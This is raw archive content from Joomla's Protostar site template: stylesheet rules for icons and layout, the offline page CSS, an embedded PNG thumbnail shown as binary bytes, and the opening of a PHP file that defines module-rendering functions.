	content: "\60";
}
.icon-quote-2:before,
.icon-quotes-right:before {
	content: "\61";
}
.icon-quote-3:before,
.icon-bubble-quote:before {
	content: "\e259";
}
.icon-phone:before {
	content: "\e260";
}
.icon-phone-2:before {
	content: "\e261";
}
.icon-envelope:before,
.icon-mail:before {
	content: "\4d";
}
.icon-envelope-opened:before,
.icon-mail-2:before {
	content: "\4e";
}
.icon-unarchive:before,
.icon-drawer:before {
	content: "\4f";
}
.icon-archive:before,
.icon-drawer-2:before {
	content: "\50";
}
.icon-briefcase:before {
	content: "\e020";
}
.icon-tag:before {
	content: "\e262";
}
.icon-tag-2:before {
	content: "\e263";
}
.icon-tags:before {
	content: "\e264";
}
.icon-tags-2:before {
	content: "\e265";
}
.icon-options:before,
.icon-cog:before {
	content: "\38";
}
.icon-cogs:before {
	content: "\37";
}
.icon-screwdriver:before,
.icon-tools:before {
	content: "\36";
}
.icon-wrench:before {
	content: "\3a";
}
.icon-equalizer:before {
	content: "\39";
}
.icon-dashboard:before {
	content: "\78";
}
.icon-switch:before {
	content: "\e266";
}
.icon-filter:before {
	content: "\54";
}
.icon-purge:before,
.icon-trash:before {
	content: "\4c";
}
.icon-checkedout:before,
.icon-lock:before,
.icon-locked:before {
	content: "\23";
}
.icon-unlock:before {
	content: "\e267";
}
.icon-key:before {
	content: "\5f";
}
.icon-support:before {
	content: "\46";
}
.icon-database:before {
	content: "\62";
}
.icon-scissors:before {
	content: "\e268";
}
.icon-health:before {
	content: "\6a";
}
.icon-wand:before {
	content: "\6b";
}
.icon-eye-open:before,
.icon-eye:before {
	content: "\3c";
}
.icon-eye-close:before,
.icon-eye-blocked:before,
.icon-eye-2:before {
	content: "\e269";
}
.icon-clock:before {
	content: "\6e";
}
.icon-compass:before {
	content: "\6f";
}
.icon-broadcast:before,
.icon-connection:before,
.icon-wifi:before {
	content: "\e01b";
}
.icon-book:before {
	content: "\e271";
}
.icon-lightning:before,
.icon-flash:before {
	content: "\79";
}
.icon-print:before,
.icon-printer:before {
	content: "\e013";
}
.icon-feed:before {
	content: "\71";
}
.icon-calendar:before {
	content: "\43";
}
.icon-calendar-2:before {
	content: "\44";
}
.icon-calendar-3:before {
	content: "\e273";
}
.icon-pie:before {
	content: "\77";
}
.icon-bars:before {
	content: "\76";
}
.icon-chart:before {
	content: "\75";
}
.icon-power-cord:before {
	content: "\32";
}
.icon-cube:before {
	content: "\33";
}
.icon-puzzle:before {
	content: "\34";
}
.icon-attachment:before,
.icon-paperclip:before,
.icon-flag-2:before {
	content: "\72";
}
.icon-lamp:before {
	content: "\74";
}
.icon-pin:before,
.icon-pushpin:before {
	content: "\73";
}
.icon-location:before {
	content: "\63";
}
.icon-shield:before {
	content: "\e274";
}
.icon-flag:before {
	content: "\35";
}
.icon-flag-3:before {
	content: "\e275";
}
.icon-bookmark:before {
	content: "\e023";
}
.icon-bookmark-2:before {
	content: "\e276";
}
.icon-heart:before {
	content: "\e277";
}
.icon-heart-2:before {
	content: "\e278";
}
.icon-thumbs-up:before {
	content: "\5b";
}
.icon-thumbs-down:before {
	content: "\5c";
}
.icon-unfeatured:before,
.icon-asterisk:before,
.icon-star-empty:before {
	content: "\40";
}
.icon-star-2:before {
	content: "\41";
}
.icon-featured:before,
.icon-default:before,
.icon-star:before {
	content: "\42";
}
.icon-smiley:before,
.icon-smiley-happy:before {
	content: "\e279";
}
.icon-smiley-2:before,
.icon-smiley-happy-2:before {
	content: "\e280";
}
.icon-smiley-sad:before {
	content: "\e281";
}
.icon-smiley-sad-2:before {
	content: "\e282";
}
.icon-smiley-neutral:before {
	content: "\e283";
}
.icon-smiley-neutral-2:before {
	content: "\e284";
}
.icon-cart:before {
	content: "\e019";
}
.icon-basket:before {
	content: "\e01a";
}
.icon-credit:before {
	content: "\e286";
}
.icon-credit-2:before {
	content: "\e287";
}
.icon-expired:before {
	content: "\4b";
}
body {
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}
body.site {
	border-top: 3px solid #0088cc;
	padding: 20px;
	background-color: #f4f6f7;
}
body.site.fluid {
	background-color: #ffffff;
}
.thumbnail {
	margin-bottom: 9px;
}
.accordion-group {
	background: #fff;
}
.site-title {
	font-size: 40px;
	font-size: calc(16px + 2.16vw);
	line-height: 48px;
	font-weight: bold;
}
@media (min-width: 1024px) {
	.site-title {
		font-size: 40px;
	}
}
.brand {
	color: #001a27;
	-webkit-transition: color .5s linear;
	-moz-transition: color .5s linear;
	-o-transition: color .5s linear;
	transition: color .5s linear;
}
.brand:hover {
	color: #005e8d;
	text-decoration: none;
}
.header {
	margin-bottom: 10px;
}
.header .finder {
	margin-top: 14px;
}
.header .finder .btn {
	margin-top: 0px;
}
.navigation {
	padding: 5px 0;
	border-top: 1px solid rgba(0,0,0,0.075);
	border-bottom: 1px solid rgba(0,0,0,0.075);
	margin-bottom: 10px;
}
.navigation .nav-pills {
	margin-bottom: 0;
}
.hero-unit {
	background-color: #08C;
}
.hero-unit > * {
	color: white;
	text-shadow: 1px 1px 1px rgba(0,0,0,0.5);
}
.container {
	max-width: 960px;
}
.body .container {
	background-color: #fff;
	-moz-border-radius: 4px;
	-webkit-border-radius: 4px;
	border-radius: 4px;
	padding: 20px;
	border: 1px solid rgba(0,0,0,0.15);
	-moz-box-shadow: 0px 0px 6px rgba(0,0,0,0.05);
	-webkit-box-shadow: 0px 0px 6px rgba(0,0,0,0.05);
	box-shadow: 0px 0px 6px rgba(0,0,0,0.05);
}
.well .page-header {
	margin: 0px 0px 5px 0px;
}
h1,
h2,
h3,
h4,
h5,
h6 {
	margin: 12px 0;
	word-wrap: break-word;
}
h1 {
	font-size: 26px;
	line-height: 28px;
}
h2 {
	font-size: 22px;
	line-height: 24px;
}
h3 {
	font-size: 18px;
	line-height: 20px;
}
h4 {
	font-size: 14px;
	line-height: 16px;
}
h5 {
	font-size: 13px;
	line-height: 15px;
}
h6 {
	font-size: 12px;
	line-height: 14px;
}
.module-header {
	padding-bottom: 17px;
	margin: 20px 0 18px 0;
	border-bottom: 1px solid #eeeeee;
}
p {
	word-wrap: break-word;
}
.item-title {
	margin-bottom: 9px;
}
.item-content {
	margin: 18px 0;
}
.item-subtitle {
	margin-bottom: 9px;
}
.pull-right.item-image {
	margin: 0 0 18px 20px;
}
.pull-left.item-image {
	margin: 0 20px 18px 0;
}
.header .nav > li:last-child > .dropdown-menu,
.item-actions .dropdown-menu,
.item-comment .dropdown-menu {
	left: initial;
	right: 0;
}
.article-index {
	margin: 0 0 10px 10px;
}
.list-item-title {
	margin-bottom: 9px;
}
.list-item-content {
	margin: 18px 0;
}
.list-item-subtitle {
	margin-bottom: 9px;
}
.items-more,
.content-links {
	padding: 15px 0;
}
.breadcrumb {
	margin: 10px 0;
}
.breadcrumb > li,
.breadcrumb > .active {
	color: #515151;
}
#login-form {
	margin-top: 8px;
}
.add-on + #modlgn-username,
.add-on + #modlgn-passwd {
	width: 132px;
}
.img_caption .left {
	float: left;
	margin-right: 1em;
}
.img_caption .right {
	float: right;
	margin-left: 1em;
}
.img_caption .left p {
	clear: left;
	text-align: center;
}
.img_caption .right p {
	clear: right;
	text-align: center;
}
.img_caption {
	text-align: center !important;
}
.img_caption.none {
	margin-left: auto;
	margin-right: auto;
}
figure {
	display: table;
}
figure.pull-center,
img.pull-center {
	margin-left: auto;
	margin-right: auto;
}
figcaption {
	display: table-caption;
	caption-side: bottom;
}
#aside .nav .nav-child {
	border-left: 2px solid #ddd;
	padding-left: 5px;
}
.navigation .nav-child {
	position: absolute;
	top: 95%;
	left: 0;
	z-index: 1000;
	display: none;
	float: left;
	min-width: 160px;
	padding: 5px 0;
	margin: 2px 0 0;
	list-style: none;
	background-color: #fff;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	*border-right-width: 2px;
	*border-bottom-width: 2px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
}
.navigation .nav-child.pull-right {
	right: 0;
	left: auto;
}
.navigation .nav-child .divider {
	*width: 100%;
	height: 1px;
	margin: 8px 1px;
	*margin: -5px 0 5px;
	overflow: hidden;
	background-color: #e5e5e5;
	border-bottom: 1px solid #fff;
}
.navigation .nav-child a {
	display: block;
	padding: 3px 20px;
	clear: both;
	font-size: 13px;
	font-weight: normal;
	line-height: 18px;
	color: #333;
	white-space: nowrap;
}
.navigation .nav li {
	position: relative;
}
.navigation .nav > li:hover > .nav-child,
.navigation .nav > li > a:focus + .nav-child,
.navigation .nav li li:hover > .nav-child,
.navigation .nav li li > a:focus + .nav-child {
	display: block;
}
.navigation .nav > li:before {
	position: absolute;
	top: 100%;
	right: 0;
	left: 0;
	height: 6px;
	content: '';
}
.navigation .nav > li > .nav-child:before {
	position: absolute;
	top: -7px;
	left: 9px;
	display: inline-block;
	border-right: 7px solid transparent;
	border-bottom: 7px solid #ccc;
	border-left: 7px solid transparent;
	border-bottom-color: rgba(0,0,0,0.2);
	content: '';
}
.navigation .nav > li > .nav-child:after {
	position: absolute;
	top: -6px;
	left: 10px;
	display: inline-block;
	border-right: 6px solid transparent;
	border-bottom: 6px solid #ffffff;
	border-left: 6px solid transparent;
	content: '';
}
.navigation .nav li li .nav-child {
	top: -8px;
	left: 100%;
}
.navigation .nav li li .nav-child:before {
	position: absolute;
	top: 9px;
	left: -7px;
	display: inline-block;
	border-top: 7px solid transparent;
	border-right: 7px solid rgba(0,0,0,0.2);
	border-bottom: 7px solid transparent;
	content: '';
}
.navigation .nav li li .nav-child:after {
	position: absolute;
	top: 10px;
	left: -6px;
	display: inline-block;
	border-top: 6px solid transparent;
	border-right: 6px solid #ffffff;
	border-bottom: 6px solid transparent;
	content: '';
}
.navigation .nav-child li > a:hover,
.navigation .nav-child li > a:focus,
.navigation .nav-child:hover > a {
	text-decoration: none;
	color: #fff;
	background-color: #005e8d;
	background-color: #005783;
	background-image: -moz-linear-gradient(top,#005e8d,#004d74);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#004d74));
	background-image: -webkit-linear-gradient(top,#005e8d,#004d74);
	background-image: -o-linear-gradient(top,#005e8d,#004d74);
	background-image: linear-gradient(to bottom,#005e8d,#004d74);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff004c73', GradientType=0);
}
.categories-list .collapse {
	margin-left: 20px;
}
@media (max-width: 480px) {
	.item-info > span {
		display: block;
	}
	.blog-item .pull-right.item-image {
		margin: 0 0 18px 0;
	}
	.blog-item .pull-left.item-image {
		margin: 0 0 18px 0;
		float: none;
	}
}
@media (max-width: 768px) {
	body {
		-webkit-overflow-scrolling: touch;
		padding-top: 0;
	}
	.header {
		background: transparent;
	}
	.header .brand {
		float: none;
		display: block;
		text-align: center;
	}
	.header .nav.pull-right,
	.header-search {
		float: none;
		display: block;
	}
	.header-search form {
		margin: 0;
	}
	.header-search .search-query {
		width: 90%;
	}
	.header .nav-pills > li > a {
		border: 1px solid #ddd;
		border-bottom: 0;
		margin: 0;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.header .nav-pills > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.header .nav-pills > li:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom: 1px solid #ddd;
	}
	.modal.fade {
		top: -100%;
	}
	.nav-tabs {
		border-bottom: 0;
	}
	.nav-tabs > li {
		float: none;
	}
	.nav-tabs > li > a {
		border: 1px solid #ddd;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.nav-tabs > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.nav-tabs > li:last-child > a,
	.nav-tabs > .active:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom: 1px solid #ddd;
	}
	.nav-tabs > li > a:hover {
		border-color: #ddd;
		z-index: 2;
	}
	.nav-tabs.nav-dark > li > a {
		border: 1px solid #333;
	}
	.nav-tabs > li:last-child > a,
	.nav-tabs > .active:last-child > a {
		border-bottom: 1px solid #333;
	}
	.nav-tabs.nav-dark > li > a:hover {
		border-color: #333;
	}
	.nav-pills > li {
		float: none;
	}
	.nav-pills > li > a {
		margin-right: 0;
	}
	.nav-pills > li > a {
		margin-bottom: 3px;
	}
	.nav-pills  > li:last-child > a {
		margin-bottom: 1px;
	}
	.form-search > .pull-left,
	.form-search > .pull-right {
		float: none;
		display: block;
		margin-bottom: 9px;
	}
}
@media (max-width: 980px) {
	.navbar-fixed-top {
		margin-bottom: 0 !important;
	}
	.item-comment .item-image {
		display: none;
	}
	.well {
		padding: 10px;
	}
}
@media (max-width: 979px) {
	.nav-collapse.in.collapse {
		overflow: visible;
		height: 0;
		z-index: 100;
	}
	.nav-collapse .nav > li.active > a {
		color: #fff;
	}
	.nav-collapse .nav > li.active > a:hover {
		color: #555;
	}
}
@media (min-width: 768px) and (max-width: 979px) {
	#login-form .input-small {
		width: 62px;
	}
}
dl.tabs {
	float: left;
	margin-bottom: -1px;
}
dl.tabs dt.tabs {
	float: left;
	margin-left: 3px;
	padding: 4px 10px;
	background-color: #F0F0F0;
	border-top: 1px solid #CCC;
	border-left: 1px solid #CCC;
	border-right: 1px solid #CCC;
}
dl.tabs dt:hover {
	background-color: #F9F9F9;
}
dl.tabs dt.open {
	background-color: #FFF;
	border-bottom: 1px solid #FFF;
}
dl.tabs dt.tabs h3 {
	margin: 0;
	font-size: 1.1em;
	font-weight: normal;
}
dl.tabs dt.tabs h3 a {
	color: #0088CC;
}
dl.tabs dt.tabs h3 a:hover {
	color: #005580;
	text-decoration: none;
}
dl.tabs dt.open h3 a {
	color: #000;
	text-decoration: none;
}
div.current dd.tabs {
	margin: 0;
	padding: 10px;
	clear: both;
	border: 1px solid #CCC;
	background-color: #FFF;
}
#pop-print {
	float: right;
	margin: 10px;
}
code {
	white-space: pre-wrap;
}
#filter-search {
	vertical-align: top;
}
.editor {
	overflow: hidden;
	position: relative;
}
.search span.highlight {
	background-color: #FFFFCC;
	font-weight: bold;
	padding: 1px 0;
}
dt.result-title {
	word-wrap: break-word;
}
dd.result-text {
	word-wrap: break-word;
}
body.modal-open {
	overflow: hidden;
	-ms-overflow-style: none;
}
#users-profile-custom label {
	display: inline;
}
.controls > .radio:first-child,
.controls > .checkbox:first-child {
	padding-top: 0;
}
.form-horizontal .controls > .radio:first-child,
.form-horizontal .controls > .checkbox:first-child {
	padding-top: 5px;
}
.form-horizontal .controls > .radio.btn-group:first-child {
	padding-top: 0;
}
.field-media-wrapper .modal .modal-body {
	padding: 5px 10px;
	overflow: hidden;
}
#search-results {
	clear: both;
}
#finder-filter-window {
	overflow: visible;
}
#finder-search .in.collapse {
	overflow: visible;
}
.well select,
.well .chzn-container {
	max-width: 100%;
}
.container-popup {
	padding: 28px 10px 10px 10px;
}
li {
	word-wrap: break-word;
}
ul.manager .height-50 .icon-folder-2 {
	height: 35px;
	width: 35px;
	line-height: 35px;
	font-size: 30px;
}
.popover-content {
	min-height: 33px;
}
.finder-selects {
	margin: 0 15px 15px 0;
}
.header-search .mod-languages ul {
	margin: 0 0 5px 0;
}
.btn-group > .versions {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.rtl .navigation .nav-child {
	left: auto;
	right: 0;
}
.rtl .navigation .nav > li > .nav-child:before {
	left: auto;
	right: 12px;
}
.rtl .navigation .nav > li > .nav-child:after {
	left: auto;
	right: 13px;
}
.rtl .categories-list .collapse {
	margin: 0 20px 0 0;
}
.rtl .modal-footer button {
	float: left;
}
.rtl .finder-selects {
	margin: 0 0 15px 15px;
}
PK՜�\��A5��protostar/css/offline.cssnu�[���/**
 * @copyright	(C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license	GNU General Public License version 2 or later; see LICENSE.txt
 */

body.site {
	margin: 0;
	padding: 0;
}

.outer {
	display: table;
	position: absolute;
	height: 100%;
	width: 100%;
}

.middle {
	display: table-cell;
	vertical-align: middle;
}

.inner {
	margin: 0 auto;
	max-width: 30em;
	background-color: #ffffff;
}

.header {
	text-align: center;
	margin: 0 0 1em 0;
}

img {
	max-width: 100%;
	height: auto;
	border: 0;
}

form, fieldset {
	margin: 0;
	padding: 0;
}

label {
	display: block;
	margin: 0;
}

input[type="text"], input[type="password"] {
	box-sizing: border-box;
	width: 100%;
	height: auto;
}

input {
	margin: .5em 0 1em 0;
}
PK՜�\j�O O  protostar/template_thumbnail.pngnu�[����PNG


IHDR���Gl�PLTE �?e	L�`�������$R?CZ"���q��#)bC{j{���δ��`��d����EWt-R@�Ü���3��Y�*$*&JH����Y�F�
+l��N
 3s�p���LZjf�8!3RLQS+6+1ClN����	Z�
/rBs��������c$4B�`n���$9Kk0���Ӂ/9\1R#B
B��:c8Ic�f3x���uy������P���킍�=�)/K:k(7Ty�Q+d���1RY�������jt�¾�Al���(�e�fff��
!H��R�*A_J|�33���7|���J����I����!:	R�|�n����"+K!0Z�z����ŧ�2
W�||�r�+A��h���h� 5Z79N!/4s��3Gm&d��J�����Gt#;_���;�B� 6\ғ��<ӽ�֢����J���
��y��	M�	!:
H��̙B��k�Y�Wax���2b�>5��눆�S�)9[H{/L�be
{�lު��!4(R�������-k*�ΑDs�Ұ������S����ry�s��/@Z�����"07e�[��(:��B��������q�"}����3Jf���
:t������
g������[�BQk�EJ2Cbu�3{2"6Q(K���
(D
m������C�M��ۣy�<j�w,\+H
Q�'������������t��������(B)J"J"B(R1X([��
IDATx^Ĕ�$1��/����8Z�	��[̀I��+�0��������L�L\jG���)�SabC���������a�Ϟmk&�u�&��Q	I�|>u�Zi�a�@��w�����+�:�(��A��4�}Z$;�f���NY%�x�j��;d3�fO��0:]�����L�[PZY2M����L&y�aK��l��.�Bϸ.5�_6�L3`��u|�tJ���Yl\�3�\��_k-��j+��*���Zm���"H
$m#�VG9�	J�T����R�F�ox�q|�T�d��!$�*�U�[�N�=``�D�F�	b�ay:X�{(&��u ���=�oJ��\e"3*��ء���4�w��׸ϸo�)�A?Yf�ِ���RO����e�
�'�4B@�#�8�&rK�'�O��pٌ��͒����1��GH|�tu��py�
��O9ȾA���߅�3fL�qARr6u��g������~�h_�� FT~�,s�v���"1:h������Y��BA��XU�52�; �@m��6
�q?��M��e4�2�8!
�u?HE���K鰃�w3����NT�`�P��'yA�"(�S��IÊ�^Ӳ���]���69}�}�5���g+��s��ϡ4a��.��.�����0L3�0���g���l:�Ϫ���}N�lW����çK��`84<�P�;��[
S@ɞ8�gn�׽ÃC*��{`4�S@sz%�Y��P
=6�Gѣ��{���������Wt=J7�XQ׍����bCoČ x��4���p��'���~\�;y��9Ɨ4@�
?�b�Hr��`ma!WՆk�j���k7��ld��i���)�����	�F��Lj4	8�H�ҕ@H��`�1I��z�'zc��{���P12P4*U~h*P5�+FH]I��s%`|��L�ә��ir:��)�pNۍCy�"�y����q���:O]ɲ1B'�8��18��B4�~d�$�HB��\'2H!"�"��]�� �yJ�H��sz�{aKtz��|>\�E"�2a�{�%*
-E�O�"��%)���n(�X��Z�W��3�e���Xfy��U�����3���+�3�>�v8��9�(v�tN�l�ʑ�\�!�,���P<"n��sL�/��i�p�µp�V��5��	��D�
��U��9�r��a���@�[�e�D��%��9��G�x�E<�/L�q�VzPb���9�l���8��w?�����Vi�c3Nb\��-��2~��؍�9��@)���36Ƕ��jǡm\w��Y`��S*(��C='�Y/�[���V
31-��q�(�:�F8U �qB�#�	�_�,�KPX	/H,hh`���V��{O��'�����'��{����.$�yP�t��?�=��jM�\a�%��-)�g���_�L�Z�)�m�!�E�)�j����������'�)��df����7���+#O��7 3H,p����o�9��/������l���N:�Eq8�"X��h1��&uҫ��㏬?X�aY���iι����=8/�z��J���v�&BbH�@��bilͶ	ea����0�l4�r��^��� ���)�jJ�����54�����i< ��l˗��gBz$�����f�$�a`0�gF�@]���Q*�#awN�>�fyy���������0M<��i8"1Q���a��f���`�}NZT�'g
��f�D�3Y=���J|]Nz������HqT�"D���i�r|�V��`�;v�N�yZ�i��.t��4M�q��>]ojy�3Z;���BO���y�B]���4p� �7��^c �0���
H@m�6�,����K�S��F�ؿ���GK���?��<�����bixC-˲�в�kpz�p�
r���DƠ״8��>G�D�#�
bT�XVHi3L$����0����+׮=�������t����c`��䇫s�B�i�X��U<Y�1�ݐ3�#�Gg��ћytV��>����F'�f�@����կ7
��T���m��7�n
�v����}���)}�8��8�VP
�krD���|n�\�2R^	��€Z�i`�	���=��W��B��B��m�u��ab����;#w��2p�m�np6����R}���%���Ɇ,�a����U���o!�����M��vS�#O:ȉF�:��SZ'�m��S�<���m�]�$O(�)5A��������[{7�<�9�k�ϴ���N�D3p]�
��	�0��UWxpp��S�h��sDuP#9�_����o����ir
� N�Z���v*����T<�gV��������w�̩�_>y�c�ڕ��q��qb���s�fj��W�ې#��G�U�����v�����1�IV3��J&�+TWS�d.��$3��jf�x�����'g+�D���?��g��^1���R'���HU竫/�.-�q�m|p����&�t�������O�
�B&�L�P�̋TΨ�\��VS���^�2
X��A��v��9�KO�����ųDj�
VR��.��&$G�D.Ek`�r�k�~��j�E���<޺%�>G�n���Ȧ�]>���l��[a�ICt��y�3{��/���=/?)��,��8��x^L���J�a[�ٴ-��u]&({ضcG��6��:�kﮍ^�8xil���y�xV�rZ�#N�*�w�	-+�l���H�!��ՐH�ENu�.�04
�xyk-�A
(v2�C2�v����mY���
����F��?l�i��46�MO��{>����m6��[�ۅ�Rr�s(�{GЮz��2�9=9����pwcc�Q�����@up�)O�<.���d��P(�g&rf+��"248^�#֐��=Qcy�*�txRq+��}��E��v"7E6�}��(5'�'�ay�&�bU9��q`��C	��؝��V�q:�r�O.L�>
�v�x=�(x�a�HMs�;�t<�zw]>Y3
��A@!L�E��`C��?�����(���\;Wv�@�٬��%A�3��=:4br6|�@�5���MF��Ȼg�(d5�K�e��r�v�ԏo,<�V����ݍ��1 C=J|���
=R�X�K9�� 0M^6��9���|��>o:�f�)9:ͦ�gg�xHXIu@�lI
>*@�Ã�Ϛ�o4��o�Q�i/�(z8��^�绋��ݾک� ��18��&�/֩<��L�(��l�D8�1�ul>cp��T�p ȁ�L��L1x��?����b�����D��au+��7Zv&��pN��b�H��ǚ��}���O���
Ca<t������:3t��^�K�C4KT8L8��-�<d�t��P/Y�h��9C� K?9&�5ؗ4��O/DO��I��dk��ݿ��	�S�~��<�9^>����w�L��,��2�0�2{�>��@�F��)��_@�������E�!B�<a̽CN7���|M����䝤y�5�����i�>p~|�_�O���X�H�$��	�"g��'�����4wѣ�l;��=ʲ�lʚ�!�ywH\T�p�aY*WT�F�^2���WW�������{W=��s ��0G�.��~���ɗz��آ1����	�z�*`��]˵w��f�羾Ņ��/�3����8��R[&�ZGUƹ�O<2�dd�3K+i���V��$
7��p��(�x!�θYe��-��S�	{E�ᅝ��m��a����8�nc:���h�yN�.�I��i	�Ԛ,��'�UE��ZJW[�W���r�IҖ����%MO�h��o���A�iz�w�8Rw��5�y�$ٲ�9F�K4��bcx��%�@$�O� 
>�Z�Z��pD}I.��qvayM��I��6f���KUTg!�����I�5
E�v�O���<�z���E:"#b��j�ws�">���Yiu�"G�����F�7�˒�?�J���
!_AoC)�IК|�
�
�b�Y�XEZh����$�.q�Z!��o��!Z�y5���V������4��]w��,4
��b��l�K��8"�g��H���a0
�܏ﰁ�v:@`�|�t�0r�=�����*R�>�9��},���Ų�)b~���!�i����~�(�9��8�Vq���b����DfA�Y��Z,���Qɴo��N���m[���!��1Nb�8z�G�}J���w�� eJ	�q�R����(8�ah:�,aU+"�;"� C�b|�B���VW?��L�q�I��\
z��‚J��T�i��]#�����A�c'B3zǹ��\�n��:��%
aDC�@��Q�0���G	��L��g�r�Y5����q�p��d
s��Z�ډ�j����}X��6DU@tg�<�}N�<�
�-"`���Q�>y�y��FX�*���.��JZ��S/zS4oU�j2�V�"D<��;��V����출y�H]�Zv!���e�Ӫfiu�5�Ͳ�tRR�4��K�@�	�H=���䁠l�Iz��k�FB��2Ԩ�����P39�$\8��y�i76��4�4��i��R~�k�盭4Ⱥ�-�A;�
��9��@��r���@����w޻Yw�K�qTRr�����a�j��5�fX47 �r�
=m�ߛ�ux8�Y�8�=��1O�t���I��‘��ru[��R�c���V�i�n��rxa�x������xl����>�ĉцr�ӹ*������6�t_"�:t�Q7'��$�v��q@�c߆����R�x�}쩭�!�p��:���\Roi�Yei�DU<�u��3H7(G4׈^�#x�����ކW�H�
�p�N��hfh����z�ca���E�m�JM�x�.�41&5�<>�&Ur��HE�W����+�z2Y��gT��h���3�!N��v��u�_<�v�!��[O8���O�0;vm[��^�At���q�Û��s��E��0���y�d<t�d蔡:he08t���]��A�?��s�QU���7T�	����mZq"���뺺Ҕe���ܴONNz� ��Y6�ϳ�K��n�e)��r�]�"
qʟ6y��R��源�Q�c/�/��@�ѷ�WbQ�ҥ��gL{N�5�� G����9���m��E�$���vɞv�o�:1�b�|�J���YG;�`$�q��Xc��M�I
��ɨ�#�9k�w�Ge���"ig��_�~"Pv��$��\�����Z���Xa�<�5-/c�#>���*�\(��i�9U�h�x|gg���qy2��^t��_�L����^��I�I:]��۟N�{xJ��}���1���f
WEE��:0@Ȅ�
>������V9��L�㺊�Q;��xw�o!ˏ�?3�ڦC�Ow���Ow�$�s�s|��4��O�'\>]5o���r��h�k\��#x��ߙb#���#;m��v;�Y���b6C7�.q.aA=w4oi�Y.��~�
yH�C�0��J��x�}S��Cű�\�
O�'{u��0^/p�&�R"�]h9��!�55
{.�E���s�4h�
y�Y��Ղ8����� �(��
N�㐎W�v�����48�1�A9�I�fC�|�;g��������ha��b�Z��,���(ν])��#ɕ�ˡ�g<�y��\;���4�r���S��B�=���S���OQ*��D����9�+� �Ԝ��gMő�_�7M�
0��+$�Ws<���.�¼�	W'w��?<Ǒp9,:lG�����9h�R8�C�`������Z�Z��/�׫9��DhI88�`9��^��U2go�N(��*��@#�8l M������"�sش���B��I�‘��E�]pƻ8�i�H{z�Y���\8[��k��X��.��jxQ{����L̥�E �R �а՜�yv�45�)Æ��،��v�t�����2��&zt�ۘ<�z5X�^�����i
N�E8�h�=�m	أ]ČQϾ$N�	q��yM�3�-�~�����Q5�!M��Y�'�����G�#E>���
����DTkb��g_��Ig��`���^b�f:B�0��oo��q�%
S��A|1=���P��Z�<l�����`�f����3ȘSA0��C��~���0��3L���$�C��� �̗�Bc	���6���{P�Hdšɝjؤ�8�G8�<�N	<�$�Ͳl���4ϸ��`0�LRѴh����#3�vm]I!���A^����#^�Dk�v�e�;GE2r��{2��m�7���7f��;�����94��1qp��1����\��h�Fd?G��|�E�#���D�v0Gy�8
�~�_]vl�6D���A�ʔ(p��C�p�G�����5(:�
��ӄ���X
���qW	3; )QR�ٲ�J�q��}X?�t�n�>����\��7�C�swx���8'�Sa��xt
���1@�=/C�YL����*^��(�;�a�{t(=B���'5�yB�,�kĹ��NӤW�`�������q���3s�8>,O�|#H!�L��)GuGH"W
jz �Q�,�K��*����YqJ�,<�Y�t�<߽�Wi�]�8E�����&�w���Rc��ǸI�EL*�2�#AҬ9�A�����s��"�Ajm�j�@��)8��� 	�:*�*ɒ[u�f�f�ق��sBy�A}�A�f�S��5�$@*�H3�k�HGyR�3L��dN����z��<�B�:60�|t�	�21\�)Ҙ�_=8W}eY6���8����|��FB&��A���@(P���ܨ��	�ʙ|Qjq�h��韒$��<!b!QJ`,�oޙ�u�������v��ܐ�4�0�-DU�
U��Ѣq��I�L�t'ꓳ�
y�<>:?*�M��g�:�_}vu�S�,f�Uj��xي��:9�R,8�*�$Rn�x�g�#N8�!�x��5��nY���1�Ǣ��,m�|����� ���Ԝ�9@�Fx�)���t(�� �\r�%K�֍ڃ���1�� �H��0�
��E!
�7cc��TY:ۚ������Q9���}�"I��IEND�B`�PK՜�\� &QQprotostar/html/modules.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * This is a file to add template specific chrome to module rendering.  To use it you would
 * set the style attribute for the given module(s) include in your template to use the style
 * for each given modChrome function.
 *
 * eg. To render a module mod_test in the submenu style, you would use the following include:
 * <jdoc:include type="module" name="test" style="submenu" />
 *
 * This gives template designers ultimate control over how modules are rendered.
 *
 * NOTICE: All chrome wrapping methods should be named: modChrome_{STYLE} and take the same
 * two arguments.
 */

/*
 * Module chrome for rendering the module in a submenu
 */
function modChrome_no($module, &$params, &$attribs)
{
	if ($module->content)
	{
		echo $module->content;
	}
}

function modChrome_well($module, &$params, &$attribs)
{
